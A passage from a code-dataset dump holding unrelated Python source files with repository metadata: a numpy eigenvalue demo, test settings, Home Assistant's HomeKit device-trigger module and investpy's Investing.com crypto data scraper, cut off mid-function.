c7ddb844b91a3780ee7e60c52dc483fd56926fac | 36957a9ce540846d08f151b6a2c2d582cff1df47 | /VR/Python/Python36/Lib/site-packages/django/contrib/messages/constants.py | fbdce4e4d9bd4e5cf428861ea358ba890c129cfe | [] | no_license | aqp1234/gitVR | 60fc952307ef413e396d31e0d136faffe087ed2b | e70bd82c451943c2966b8ad1bee620a0ee1080d2 | refs/heads/master | 2022-12-29T15:30:12.540947 | 2020-10-07T15:26:32 | 2020-10-07T15:26:32 | 290,163,043 | 0 | 1 | null | 2020-08-25T09:15:40 | 2020-08-25T08:47:36 | C# | UTF-8 | Python | false | false | 128 | py | version https://git-lfs.github.com/spec/v1
oid sha256:599c63cef128288ee6802852169fe0f5efb3507f2be892e1bbdb05b1fb5318d0
size 312
| [
"aqp1234@naver.com"
] | aqp1234@naver.com |
a154800e384742afe40229723c6a82fd41ef1463 | fa0ae8d2e5ecf78df4547f0a106550724f59879a | /Numpy/day06/eig.py | 6c39941771c00a8b74a849b9b48b7c2ab172336f | [] | no_license | Polaris-d/note | 71f8297bc88ceb44025e37eb63c25c5069b7d746 | 6f1a9d71e02fb35d50957f2cf6098f8aca656da9 | refs/heads/master | 2020-03-22T17:51:49.118575 | 2018-09-06T03:36:00 | 2018-09-06T03:36:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 325 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import numpy as np
A = np.mat('3 -2; 1 0')
print(A)
eigvals, eigvecs = np.linalg.eig(A)
print(eigvals, eigvecs, sep='\n')
a = eigvals[0]
x = eigvecs[:, 0]
print(A * x, a * x, sep='\n')
a = eigvals[1]
x = eigvecs[:, 1]
print(A * x, a * x, sep='\n')
| [
"610079251@qq.com"
] | 610079251@qq.com |
56f14e7c79bc56c708ce4d9309d16fc8f969159e | a2e10b9a73ccfb80fbb98d47532d4c6a6de49be7 | /utils/stringIO/grail/settings.py | 942fc950c065c1041feb11cc0ca9f2acb2001c96 | [] | no_license | yuqi-test/ECProAutomation | 81a04b77c9226acd4f745bf59df3c741bd9d3605 | 9c08c5b3bd122809fbb5b44cd933f4240e42e4f7 | refs/heads/master | 2022-04-21T11:46:17.788667 | 2020-04-21T10:12:52 | 2020-04-21T10:12:52 | 257,553,619 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 398 | py | export_mode = False
disable_steps = False
print_step_time = False
step_time_template = '[{0:4.2f}s] '
indentation_const = ' '
skip_func = ('setup',
'teardown',
'setup_class',
'teardown_class',
'setup_module',
'teardown_module',
'setup_package',
'teardown_package',
'tearDown',
)
| [
"yuqi@infimind.com"
] | yuqi@infimind.com |
361d302383edd8c481ca9343608831aae35d9763 | 5963c12367490ffc01c9905c028d1d5480078dec | /homeassistant/components/homekit_controller/device_trigger.py | 818b75e47d3c3528f911983eb9db25fa0fe05125 | [
"Apache-2.0"
] | permissive | BenWoodford/home-assistant | eb03f73165d11935e8d6a9756272014267d7d66a | 2fee32fce03bc49e86cf2e7b741a15621a97cce5 | refs/heads/dev | 2023-03-05T06:13:30.354545 | 2021-07-18T09:51:53 | 2021-07-18T09:51:53 | 117,122,037 | 11 | 6 | Apache-2.0 | 2023-02-22T06:16:51 | 2018-01-11T16:10:19 | Python | UTF-8 | Python | false | false | 8,675 | py | """Provides device automations for homekit devices."""
from __future__ import annotations
from aiohomekit.model.characteristics import CharacteristicsTypes
from aiohomekit.model.characteristics.const import InputEventValues
from aiohomekit.model.services import ServicesTypes
from aiohomekit.utils import clamp_enum_to_char
import voluptuous as vol
from homeassistant.components.automation import AutomationActionType
from homeassistant.components.device_automation import DEVICE_TRIGGER_BASE_SCHEMA
from homeassistant.const import CONF_DEVICE_ID, CONF_DOMAIN, CONF_PLATFORM, CONF_TYPE
from homeassistant.core import CALLBACK_TYPE, HomeAssistant, callback
from homeassistant.helpers.typing import ConfigType
from .const import DOMAIN, KNOWN_DEVICES, TRIGGERS
TRIGGER_TYPES = {
"doorbell",
"button1",
"button2",
"button3",
"button4",
"button5",
"button6",
"button7",
"button8",
"button9",
"button10",
}
TRIGGER_SUBTYPES = {"single_press", "double_press", "long_press"}
CONF_IID = "iid"
CONF_SUBTYPE = "subtype"
TRIGGER_SCHEMA = DEVICE_TRIGGER_BASE_SCHEMA.extend(
{
vol.Required(CONF_TYPE): vol.In(TRIGGER_TYPES),
vol.Required(CONF_SUBTYPE): vol.In(TRIGGER_SUBTYPES),
}
)
HK_TO_HA_INPUT_EVENT_VALUES = {
InputEventValues.SINGLE_PRESS: "single_press",
InputEventValues.DOUBLE_PRESS: "double_press",
InputEventValues.LONG_PRESS: "long_press",
}
class TriggerSource:
"""Represents a stateless source of event data from HomeKit."""
def __init__(self, connection, aid, triggers):
"""Initialize a set of triggers for a device."""
self._hass = connection.hass
self._connection = connection
self._aid = aid
self._triggers = {}
for trigger in triggers:
self._triggers[(trigger["type"], trigger["subtype"])] = trigger
self._callbacks = {}
def fire(self, iid, value):
"""Process events that have been received from a HomeKit accessory."""
for event_handler in self._callbacks.get(iid, []):
event_handler(value)
def async_get_triggers(self):
"""List device triggers for homekit devices."""
yield from self._triggers
async def async_attach_trigger(
self,
config: TRIGGER_SCHEMA,
action: AutomationActionType,
automation_info: dict,
) -> CALLBACK_TYPE:
"""Attach a trigger."""
trigger_data = (
automation_info.get("trigger_data", {}) if automation_info else {}
)
def event_handler(char):
if config[CONF_SUBTYPE] != HK_TO_HA_INPUT_EVENT_VALUES[char["value"]]:
return
self._hass.async_create_task(
action({"trigger": {**trigger_data, **config}})
)
trigger = self._triggers[config[CONF_TYPE], config[CONF_SUBTYPE]]
iid = trigger["characteristic"]
self._connection.add_watchable_characteristics([(self._aid, iid)])
self._callbacks.setdefault(iid, []).append(event_handler)
def async_remove_handler():
if iid in self._callbacks:
self._callbacks[iid].remove(event_handler)
return async_remove_handler
def enumerate_stateless_switch(service):
"""Enumerate a stateless switch, like a single button."""
# A stateless switch that has a SERVICE_LABEL_INDEX is part of a group
# And is handled separately
if (
service.has(CharacteristicsTypes.SERVICE_LABEL_INDEX)
and len(service.linked) > 0
):
return []
char = service[CharacteristicsTypes.INPUT_EVENT]
# HomeKit itself supports single, double and long presses. But the
# manufacturer might not - clamp options to what they say.
all_values = clamp_enum_to_char(InputEventValues, char)
return [
{
"characteristic": char.iid,
"value": event_type,
"type": "button1",
"subtype": HK_TO_HA_INPUT_EVENT_VALUES[event_type],
}
for event_type in all_values
]
def enumerate_stateless_switch_group(service):
"""Enumerate a group of stateless switches, like a remote control."""
switches = list(
service.accessory.services.filter(
service_type=ServicesTypes.STATELESS_PROGRAMMABLE_SWITCH,
child_service=service,
order_by=[CharacteristicsTypes.SERVICE_LABEL_INDEX],
)
)
results = []
for idx, switch in enumerate(switches):
char = switch[CharacteristicsTypes.INPUT_EVENT]
# HomeKit itself supports single, double and long presses. But the
# manufacturer might not - clamp options to what they say.
all_values = clamp_enum_to_char(InputEventValues, char)
for event_type in all_values:
results.append(
{
"characteristic": char.iid,
"value": event_type,
"type": f"button{idx + 1}",
"subtype": HK_TO_HA_INPUT_EVENT_VALUES[event_type],
}
)
return results
def enumerate_doorbell(service):
"""Enumerate doorbell buttons."""
input_event = service[CharacteristicsTypes.INPUT_EVENT]
# HomeKit itself supports single, double and long presses. But the
# manufacturer might not - clamp options to what they say.
all_values = clamp_enum_to_char(InputEventValues, input_event)
results = []
for event_type in all_values:
results.append(
{
"characteristic": input_event.iid,
"value": event_type,
"type": "doorbell",
"subtype": HK_TO_HA_INPUT_EVENT_VALUES[event_type],
}
)
return results
TRIGGER_FINDERS = {
ServicesTypes.SERVICE_LABEL: enumerate_stateless_switch_group,
ServicesTypes.STATELESS_PROGRAMMABLE_SWITCH: enumerate_stateless_switch,
ServicesTypes.DOORBELL: enumerate_doorbell,
}
async def async_setup_triggers_for_entry(hass: HomeAssistant, config_entry):
"""Triggers aren't entities as they have no state, but we still need to set them up for a config entry."""
hkid = config_entry.data["AccessoryPairingID"]
conn = hass.data[KNOWN_DEVICES][hkid]
@callback
def async_add_service(service):
aid = service.accessory.aid
service_type = service.short_type
# If not a known service type then we can't handle any stateless events for it
if service_type not in TRIGGER_FINDERS:
return False
# We can't have multiple trigger sources for the same device id
# Can't have a doorbell and a remote control in the same accessory
# They have to be different accessories (they can be on the same bridge)
# In practice, this is inline with what iOS actually supports AFAWCT.
device_id = conn.devices[aid]
if device_id in hass.data[TRIGGERS]:
return False
# Just because we recognise the service type doesn't mean we can actually
# extract any triggers - so only proceed if we can
triggers = TRIGGER_FINDERS[service_type](service)
if len(triggers) == 0:
return False
trigger = TriggerSource(conn, aid, triggers)
hass.data[TRIGGERS][device_id] = trigger
return True
conn.add_listener(async_add_service)
def async_fire_triggers(conn, events):
"""Process events generated by a HomeKit accessory into automation triggers."""
for (aid, iid), ev in events.items():
if aid in conn.devices:
device_id = conn.devices[aid]
if device_id in conn.hass.data[TRIGGERS]:
source = conn.hass.data[TRIGGERS][device_id]
source.fire(iid, ev)
async def async_get_triggers(hass: HomeAssistant, device_id: str) -> list[dict]:
"""List device triggers for homekit devices."""
if device_id not in hass.data.get(TRIGGERS, {}):
return []
device = hass.data[TRIGGERS][device_id]
return [
{
CONF_PLATFORM: "device",
CONF_DEVICE_ID: device_id,
CONF_DOMAIN: DOMAIN,
CONF_TYPE: trigger,
CONF_SUBTYPE: subtype,
}
for trigger, subtype in device.async_get_triggers()
]
async def async_attach_trigger(
hass: HomeAssistant,
config: ConfigType,
action: AutomationActionType,
automation_info: dict,
) -> CALLBACK_TYPE:
"""Attach a trigger."""
device_id = config[CONF_DEVICE_ID]
device = hass.data[TRIGGERS][device_id]
return await device.async_attach_trigger(config, action, automation_info)
| [
"noreply@github.com"
] | BenWoodford.noreply@github.com |
b96ba129827be46b1f0c7523731af7bda10b1f1b | 046674b67ad5727ec65725e826ea354ca07d71da | /investpy/crypto.py | 3878b3eb3b153a3a2edf0faa71ea87aa619e46d6 | [
"MIT"
] | permissive | alexanu/investpy | cad2d0ef3f67b4fa4ecb23a4730ae96c1a162168 | bc46d30af21f03ab5b7b9aa259b755db281277bb | refs/heads/master | 2020-12-28T08:48:01.479075 | 2020-05-15T22:42:15 | 2020-05-15T22:42:15 | 238,252,327 | 0 | 1 | MIT | 2020-05-15T22:42:16 | 2020-02-04T16:31:29 | null | UTF-8 | Python | false | false | 40,053 | py | #!/usr/bin/python3
# Copyright 2018-2020 Alvaro Bartolome @ alvarob96 in GitHub
# See LICENSE for details.
from datetime import datetime, date
import json
from random import randint
import pandas as pd
import pkg_resources
import requests
import unidecode
from lxml.html import fromstring
from investpy.utils.user_agent import get_random
from investpy.utils.data import Data
from investpy.data.crypto_data import cryptos_as_df, cryptos_as_list, cryptos_as_dict
def get_cryptos():
"""
This function retrieves all the crypto data stored in `cryptos.csv` file, which previously was
retrieved from Investing.com. Since the resulting object is a matrix of data, the crypto data is properly
structured in rows and columns, where columns are the crypto data attribute names.
Note that just some cryptos are available for retrieval, since Investing.com does not provide information
from all the available ones, just the main ones.
Returns:
:obj:`pandas.DataFrame` - cryptos_df:
The resulting :obj:`pandas.DataFrame` contains all the crypto data from every available crypto coin as
indexed in Investing.com from the information previously retrieved by investpy and stored on a csv file.
So on, the resulting :obj:`pandas.DataFrame` will look like::
name | symbol | currency
-----|--------|----------
xxxx | xxxxxx | xxxxxxxx
Raises:
FileNotFoundError: raised if `cryptos.csv` file was not found.
IOError: raised when `cryptos.csv` file is missing or empty.
"""
return cryptos_as_df()
def get_cryptos_list():
"""
This function retrieves all the crypto coin names stored in `cryptos.csv` file, which contains all the
data from the crypto coins as previously retrieved from Investing.com. So on, this function will just return
the crypto coin names which will be the main input parameters when it comes to crypto data retrieval functions
from investpy.
Note that just some cryptos are available for retrieval, since Investing.com does not provide information
from all the available ones, just the main ones.
Returns:
:obj:`list` - cryptos_list:
The resulting :obj:`list` contains the all the available crypto coin names as indexed in Investing.com
from the information previously retrieved by investpy and stored on a csv file.
In case the information was successfully retrieved, the :obj:`list` of crypto coin names will look like::
cryptos_list = ['Bitcoin', 'Ethereum', 'XRP', 'Bitcoin Cash', 'Tether', 'Litecoin', ...]
Raises:
FileNotFoundError: raised if `cryptos.csv` file was not found.
IOError: raised when `cryptos.csv` file is missing or empty.
"""
return cryptos_as_list()
def get_cryptos_dict(columns=None, as_json=False):
"""
This function retrieves all the crypto information stored in the `cryptos.csv` file and formats it as a
Python dictionary which contains the same information as the file, but every row is a :obj:`dict` and
all of them are contained in a :obj:`list`. Note that the dictionary structure is the same one as the
JSON structure. Some optional paramaters can be specified such as the columns or as_json, which are the
column names that want to be retrieved in case of needing just some columns to avoid unnecessary information
load, and whether the information wants to be returned as a JSON object or as a dictionary; respectively.
Note that just some cryptos are available for retrieval, since Investing.com does not provide information
from all the available ones, just the main ones.
Args:
columns (:obj:`list`, optional):column names of the crypto data to retrieve, can be: <name, currency, symbol>
as_json (:obj:`bool`, optional): if True the returned data will be a :obj:`json` object, if False, a :obj:`list` of :obj:`dict`.
Returns:
:obj:`list` of :obj:`dict` OR :obj:`json` - cryptos_dict:
The resulting :obj:`list` of :obj:`dict` contains the retrieved data from every crypto coin as indexed in Investing.com from
the information previously retrieved by investpy and stored on a csv file.
In case the information was successfully retrieved, the :obj:`list` of :obj:`dict` will look like::
cryptos_dict = {
'name': name,
'currency': currency,
'symbol': symbol,
}
Raises:
ValueError: raised whenever any of the introduced arguments is not valid.
FileNotFoundError: raised if `cryptos.csv` file was not found.
IOError: raised when `cryptos.csv` file is missing or empty.
"""
return cryptos_as_dict(columns=columns, as_json=as_json)
def get_crypto_recent_data(crypto, as_json=False, order='ascending', interval='Daily'):
"""
This function retrieves recent historical data from the introduced crypto from Investing.com. So on, the recent data
of the introduced crypto will be retrieved and returned as a :obj:`pandas.DataFrame` if the parameters are valid
and the request to Investing.com succeeds. Note that additionally some optional parameters can be specified: as_json
and order, which let the user decide if the data is going to be returned as a :obj:`json` or not, and if the historical
data is going to be ordered ascending or descending (where the index is the date), respectively.
Args:
crypto (:obj:`str`): name of the crypto currency to retrieve data from.
as_json (:obj:`bool`, optional):
to determine the format of the output data, either a :obj:`pandas.DataFrame` if False and a :obj:`json` if True.
order (:obj:`str`, optional): to define the order of the retrieved data which can either be ascending or descending.
interval (:obj:`str`, optional):
value to define the historical data interval to retrieve, by default `Daily`, but it can also be `Weekly` or `Monthly`.
Returns:
:obj:`pandas.DataFrame` or :obj:`json`:
The function can return either a :obj:`pandas.DataFrame` or a :obj:`json` object, containing the retrieved
recent data of the specified crypto currency. So on, the resulting dataframe contains the open, high, low,
close and volume values for the selected crypto on market days and the currency in which those values are presented.
The resulting recent data, in case that the default parameters were applied, will look like::
Date || Open | High | Low | Close | Volume | Currency
-----||------|------|-----|-------|--------|----------
xxxx || xxxx | xxxx | xxx | xxxxx | xxxxxx | xxxxxxxx
but in case that as_json parameter was defined as True, then the output will be::
{
name: name,
recent: [
{
date: 'dd/mm/yyyy',
open: x,
high: x,
low: x,
close: x,
volume: x,
currency: x
},
...
]
}
Raises:
ValueError: raised whenever any of the introduced arguments is not valid or errored.
IOError: raised if cryptos object/file was not found or unable to retrieve.
RuntimeError: raised if the introduced crypto name was not found or did not match any of the existing ones.
ConnectionError: raised if connection to Investing.com could not be established.
IndexError: raised if crypto recent data was unavailable or not found in Investing.com.
Examples:
>>> investpy.get_crypto_recent_data(crypto='bitcoin')
Open High Low Close Volume Currency
Date
2019-10-25 7422.8 8697.7 7404.9 8658.3 1177632 USD
2019-10-26 8658.4 10540.0 8061.8 9230.6 1784005 USD
2019-10-27 9230.6 9773.2 9081.0 9529.6 1155038 USD
2019-10-28 9530.1 9866.9 9202.5 9207.2 1039295 USD
2019-10-29 9206.5 9531.3 9125.3 9411.3 918477 USD
"""
if not crypto:
raise ValueError("ERR#0083: crypto parameter is mandatory and must be a valid crypto name.")
if not isinstance(crypto, str):
raise ValueError("ERR#0084: crypto argument needs to be a str.")
if not isinstance(as_json, bool):
raise ValueError("ERR#0002: as_json argument can just be True or False, bool type.")
if order not in ['ascending', 'asc', 'descending', 'desc']:
raise ValueError("ERR#0003: order argument can just be ascending (asc) or descending (desc), str type.")
if not interval:
raise ValueError("ERR#0073: interval value should be a str type and it can just be either 'Daily', 'Weekly' or 'Monthly'.")
if not isinstance(interval, str):
raise ValueError("ERR#0073: interval value should be a str type and it can just be either 'Daily', 'Weekly' or 'Monthly'.")
if interval not in ['Daily', 'Weekly', 'Monthly']:
raise ValueError("ERR#0073: interval value should be a str type and it can just be either 'Daily', 'Weekly' or 'Monthly'.")
resource_package = 'investpy'
resource_path = '/'.join(('resources', 'crypto', 'cryptos.csv'))
if pkg_resources.resource_exists(resource_package, resource_path):
cryptos = pd.read_csv(pkg_resources.resource_filename(resource_package, resource_path))
else:
raise FileNotFoundError("ERR#0081: cryptos file not found or errored.")
if cryptos is None:
raise IOError("ERR#0082: cryptos not found or unable to retrieve.")
crypto = crypto.strip()
crypto = crypto.lower()
if unidecode.unidecode(crypto) not in [unidecode.unidecode(value.lower()) for value in cryptos['name'].tolist()]:
raise RuntimeError("ERR#0085: crypto currency: " + crypto + ", not found, check if it is correct.")
status = cryptos.loc[(cryptos['name'].str.lower() == crypto).idxmax(), 'status']
if status == 'unavailable':
raise ValueError("ERR#0086: the selected crypto currency is not available for retrieval in Investing.com.")
crypto_name = cryptos.loc[(cryptos['name'].str.lower() == crypto).idxmax(), 'name']
crypto_id = cryptos.loc[(cryptos['name'].str.lower() == crypto).idxmax(), 'id']
crypto_currency = cryptos.loc[(cryptos['name'].str.lower() == crypto).idxmax(), 'currency']
header = crypto_name + ' Historical Data'
params = {
"curr_id": crypto_id,
"smlID": str(randint(1000000, 99999999)),
"header": header,
"interval_sec": interval,
"sort_col": "date",
"sort_ord": "DESC",
"action": "historical_data"
}
head = {
"User-Agent": get_random(),
"X-Requested-With": "XMLHttpRequest",
"Accept": "text/html",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
}
url = "https://www.investing.com/instruments/HistoricalDataAjax"
req = requests.post(url, headers=head, data=params)
if req.status_code != 200:
raise ConnectionError("ERR#0015: error " + str(req.status_code) + ", try again later.")
root_ = fromstring(req.text)
path_ = root_.xpath(".//table[@id='curr_table']/tbody/tr")
result = list()
if path_:
for elements_ in path_:
if elements_.xpath(".//td")[0].text_content() == 'No results found':
raise IndexError("ERR#0087: crypto information unavailable or not found.")
info = []
for nested_ in elements_.xpath(".//td"):
info.append(nested_.get('data-real-value'))
crypto_date = datetime.strptime(str(datetime.fromtimestamp(int(info[0])).date()), '%Y-%m-%d')
crypto_close = float(info[1].replace(',', ''))
crypto_open = float(info[2].replace(',', ''))
crypto_high = float(info[3].replace(',', ''))
crypto_low = float(info[4].replace(',', ''))
crypto_volume = int(info[5])
result.insert(len(result),
Data(crypto_date, crypto_open, crypto_high, crypto_low,
crypto_close, crypto_volume, crypto_currency, None))
if order in ['ascending', 'asc']:
result = result[::-1]
elif order in ['descending', 'desc']:
result = result
if as_json is True:
json_ = {
'name': crypto_name,
'recent':
[value.crypto_as_json() for value in result]
}
return json.dumps(json_, sort_keys=False)
elif as_json is False:
df = pd.DataFrame.from_records([value.crypto_to_dict() for value in result])
df.set_index('Date', inplace=True)
return df
else:
raise RuntimeError("ERR#0004: data retrieval error while scraping.")
def get_crypto_historical_data(crypto, from_date, to_date, as_json=False, order='ascending', interval='Daily'):
"""
This function retrieves historical data from the introduced crypto from Investing.com. So on, the historical data
of the introduced crypto will be retrieved and returned as a :obj:`pandas.DataFrame` if the parameters are valid
and the request to Investing.com succeeds. Note that additionally some optional parameters can be specified: as_json
and order, which let the user decide if the data is going to be returned as a :obj:`json` or not, and if the historical
data is going to be ordered ascending or descending (where the index is the date), respectively.
Args:
crypto (:obj:`str`): name of the crypto currency to retrieve data from.
from_date (:obj:`str`): date formatted as `dd/mm/yyyy`, since when data is going to be retrieved.
to_date (:obj:`str`): date formatted as `dd/mm/yyyy`, until when data is going to be retrieved.
as_json (:obj:`bool`, optional):
to determine the format of the output data, either a :obj:`pandas.DataFrame` if False and a :obj:`json` if True.
order (:obj:`str`, optional): to define the order of the retrieved data which can either be ascending or descending.
interval (:obj:`str`, optional):
value to define the historical data interval to retrieve, by default `Daily`, but it can also be `Weekly` or `Monthly`.
Returns:
:obj:`pandas.DataFrame` or :obj:`json`:
The function can return either a :obj:`pandas.DataFrame` or a :obj:`json` object, containing the retrieved
historical data of the specified crypto currency. So on, the resulting dataframe contains the open, high,
low, close and volume values for the selected crypto on market days and the currency in which those values are presented.
The returned data is case we use default arguments will look like::
Date || Open | High | Low | Close | Volume | Currency
-----||------|------|-----|-------|--------|----------
xxxx || xxxx | xxxx | xxx | xxxxx | xxxxxx | xxxxxxxx
but if we define `as_json=True`, then the output will be::
{
name: name,
historical: [
{
date: 'dd/mm/yyyy',
open: x,
high: x,
low: x,
close: x,
volume: x,
currency: x
},
...
]
}
Raises:
ValueError: raised whenever any of the introduced arguments is not valid or errored.
IOError: raised if cryptos object/file was not found or unable to retrieve.
RuntimeError: raised if the introduced crypto currency name was not found or did not match any of the existing ones.
ConnectionError: raised if connection to Investing.com could not be established.
IndexError: raised if crypto historical data was unavailable or not found in Investing.com.
Examples:
>>> investpy.get_crypto_historical_data(crypto='bitcoin', from_date='01/01/2018', to_date='01/01/2019')
Open High Low Close Volume Currency
Date
2018-01-01 13850.5 13921.5 12877.7 13444.9 78425 USD
2018-01-02 13444.9 15306.1 12934.2 14754.1 137732 USD
2018-01-03 14754.1 15435.0 14579.7 15156.6 106543 USD
2018-01-04 15156.5 15408.7 14244.7 15180.1 110969 USD
2018-01-05 15180.1 17126.9 14832.4 16954.8 141960 USD
"""
if not crypto:
raise ValueError("ERR#0083: crypto parameter is mandatory and must be a valid crypto name.")
if not isinstance(crypto, str):
raise ValueError("ERR#0084: crypto argument needs to be a str.")
if not isinstance(as_json, bool):
raise ValueError("ERR#0002: as_json argument can just be True or False, bool type.")
if order not in ['ascending', 'asc', 'descending', 'desc']:
raise ValueError("ERR#0003: order argument can just be ascending (asc) or descending (desc), str type.")
if not interval:
raise ValueError("ERR#0073: interval value should be a str type and it can just be either 'Daily', 'Weekly' or 'Monthly'.")
if not isinstance(interval, str):
raise ValueError("ERR#0073: interval value should be a str type and it can just be either 'Daily', 'Weekly' or 'Monthly'.")
if interval not in ['Daily', 'Weekly', 'Monthly']:
raise ValueError("ERR#0073: interval value should be a str type and it can just be either 'Daily', 'Weekly' or 'Monthly'.")
try:
datetime.strptime(from_date, '%d/%m/%Y')
except ValueError:
raise ValueError("ERR#0011: incorrect from_date date format, it should be 'dd/mm/yyyy'.")
try:
datetime.strptime(to_date, '%d/%m/%Y')
except ValueError:
raise ValueError("ERR#0012: incorrect to_date format, it should be 'dd/mm/yyyy'.")
start_date = datetime.strptime(from_date, '%d/%m/%Y')
end_date = datetime.strptime(to_date, '%d/%m/%Y')
if start_date >= end_date:
raise ValueError("ERR#0032: to_date should be greater than from_date, both formatted as 'dd/mm/yyyy'.")
date_interval = {
'intervals': [],
}
flag = True
while flag is True:
diff = end_date.year - start_date.year
if diff > 19:
obj = {
'start': start_date.strftime('%m/%d/%Y'),
'end': start_date.replace(year=start_date.year + 19).strftime('%m/%d/%Y'),
}
date_interval['intervals'].append(obj)
start_date = start_date.replace(year=start_date.year + 19, day=start_date.day + 1)
else:
obj = {
'start': start_date.strftime('%m/%d/%Y'),
'end': end_date.strftime('%m/%d/%Y'),
}
date_interval['intervals'].append(obj)
flag = False
interval_limit = len(date_interval['intervals'])
interval_counter = 0
data_flag = False
resource_package = 'investpy'
resource_path = '/'.join(('resources', 'crypto', 'cryptos.csv'))
if pkg_resources.resource_exists(resource_package, resource_path):
cryptos = pd.read_csv(pkg_resources.resource_filename(resource_package, resource_path))
else:
raise FileNotFoundError("ERR#0081: cryptos file not found or errored.")
if cryptos is None:
raise IOError("ERR#0082: cryptos not found or unable to retrieve.")
crypto = crypto.strip()
crypto = crypto.lower()
if unidecode.unidecode(crypto) not in [unidecode.unidecode(value.lower()) for value in cryptos['name'].tolist()]:
raise RuntimeError("ERR#0085: crypto currency: " + crypto + ", not found, check if it is correct.")
status = cryptos.loc[(cryptos['name'].str.lower() == crypto).idxmax(), 'status']
if status == 'unavailable':
raise ValueError("ERR#0086: the selected crypto currency is not available for retrieval in Investing.com.")
crypto_name = cryptos.loc[(cryptos['name'].str.lower() == crypto).idxmax(), 'name']
crypto_id = cryptos.loc[(cryptos['name'].str.lower() == crypto).idxmax(), 'id']
crypto_currency = cryptos.loc[(cryptos['name'].str.lower() == crypto).idxmax(), 'currency']
header = crypto_name + ' Historical Data'
final = list()
for index in range(len(date_interval['intervals'])):
interval_counter += 1
params = {
"curr_id": crypto_id,
"smlID": str(randint(1000000, 99999999)),
"header": header,
"st_date": date_interval['intervals'][index]['start'],
"end_date": date_interval['intervals'][index]['end'],
"interval_sec": interval,
"sort_col": "date",
"sort_ord": "DESC",
"action": "historical_data"
}
head = {
"User-Agent": get_random(),
"X-Requested-With": "XMLHttpRequest",
"Accept": "text/html",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
}
url = "https://www.investing.com/instruments/HistoricalDataAjax"
req = requests.post(url, headers=head, data=params)
if req.status_code != 200:
raise ConnectionError("ERR#0015: error " + str(req.status_code) + ", try again later.")
if not req.text:
continue
root_ = fromstring(req.text)
path_ = root_.xpath(".//table[@id='curr_table']/tbody/tr")
result = list()
if path_:
for elements_ in path_:
if elements_.xpath(".//td")[0].text_content() == 'No results found':
if interval_counter < interval_limit:
data_flag = False
else:
raise IndexError("ERR#0087: crypto information unavailable or not found.")
else:
data_flag = True
info = []
for nested_ in elements_.xpath(".//td"):
info.append(nested_.get('data-real-value'))
if data_flag is True:
crypto_date = datetime.strptime(str(datetime.fromtimestamp(int(info[0])).date()), '%Y-%m-%d')
crypto_close = float(info[1].replace(',', ''))
crypto_open = float(info[2].replace(',', ''))
crypto_high = float(info[3].replace(',', ''))
crypto_low = float(info[4].replace(',', ''))
crypto_volume = int(info[5])
result.insert(len(result),
Data(crypto_date, crypto_open, crypto_high, crypto_low,
crypto_close, crypto_volume, crypto_currency, None))
if data_flag is True:
if order in ['ascending', 'asc']:
result = result[::-1]
elif order in ['descending', 'desc']:
result = result
if as_json is True:
json_ = {
'name': crypto_name,
'historical':
[value.crypto_as_json() for value in result]
}
final.append(json_)
elif as_json is False:
df = pd.DataFrame.from_records([value.crypto_to_dict() for value in result])
df.set_index('Date', inplace=True)
final.append(df)
else:
raise RuntimeError("ERR#0004: data retrieval error while scraping.")
if as_json is True:
return json.dumps(final[0], sort_keys=False)
elif as_json is False:
return pd.concat(final)
def get_crypto_information(crypto, as_json=False):
"""
This function retrieves fundamental financial information from the specified crypto currency. The retrieved
information from the crypto currency can be valuable as it is additional information that can be used combined
with OHLC values, so to determine financial insights from the company which holds the specified crypto currency.
Args:
currency_cross (:obj:`str`): name of the currency_cross to retrieve recent historical data from.
as_json (:obj:`bool`, optional):
optional argument to determine the format of the output data (:obj:`dict` or :obj:`json`).
Returns:
:obj:`pandas.DataFrame` or :obj:`dict`- crypto_information:
The resulting :obj:`pandas.DataFrame` contains the information fields retrieved from Investing.com
from the specified crypto currency; it can also be returned as a :obj:`dict`, if argument `as_json=True`.
If any of the information fields could not be retrieved, that field/s will be filled with
None values. If the retrieval process succeeded, the resulting :obj:`dict` will look like::
crypto_information = {
'Chg (7D)': '-4.63%',
'Circulating Supply': ' BTC18.10M',
'Crypto Currency': 'Bitcoin',
'Currency': 'USD',
'Market Cap': '$129.01B',
'Max Supply': 'BTC21.00M',
'Todays Range': '7,057.8 - 7,153.1',
'Vol (24H)': '$17.57B'
}
Raises:
ValueError: raised if any of the introduced arguments is not valid or errored.
FileNotFoundError: raised if `cryptos.csv` file was not found or errored.
IOError: raised if `cryptos.csv` file is empty or errored.
RuntimeError: raised if scraping process failed while running.
ConnectionError: raised if the connection to Investing.com errored (did not return HTTP 200)
"""
if not crypto:
raise ValueError("ERR#0083: crypto parameter is mandatory and must be a valid crypto name.")
if not isinstance(crypto, str):
raise ValueError("ERR#0084: crypto argument needs to be a str.")
if not isinstance(as_json, bool):
raise ValueError("ERR#0002: as_json argument can just be True or False, bool type.")
resource_package = 'investpy'
resource_path = '/'.join(('resources', 'crypto', 'cryptos.csv'))
if pkg_resources.resource_exists(resource_package, resource_path):
cryptos = pd.read_csv(pkg_resources.resource_filename(resource_package, resource_path))
else:
raise FileNotFoundError("ERR#0081: cryptos file not found or errored.")
if cryptos is None:
raise IOError("ERR#0082: cryptos not found or unable to retrieve.")
crypto = crypto.strip()
crypto = crypto.lower()
if unidecode.unidecode(crypto) not in [unidecode.unidecode(value.lower()) for value in cryptos['name'].tolist()]:
raise RuntimeError("ERR#0085: crypto currency: " + crypto + ", not found, check if it is correct.")
status = cryptos.loc[(cryptos['name'].str.lower() == crypto).idxmax(), 'status']
if status == 'unavailable':
raise ValueError("ERR#0086: the selected crypto currency is not available for retrieval in Investing.com.")
name = cryptos.loc[(cryptos['name'].str.lower() == crypto).idxmax(), 'name']
currency = cryptos.loc[(cryptos['name'].str.lower() == crypto).idxmax(), 'currency']
tag = cryptos.loc[(cryptos['name'].str.lower() == crypto).idxmax(), 'tag']
url = "https://www.investing.com/crypto/" + tag
head = {
"User-Agent": get_random(),
"X-Requested-With": "XMLHttpRequest",
"Accept": "text/html",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
}
req = requests.get(url, headers=head)
if req.status_code != 200:
raise ConnectionError("ERR#0015: error " + str(req.status_code) + ", try again later.")
root_ = fromstring(req.text)
path_ = root_.xpath("//div[@class='cryptoGlobalData']/div")
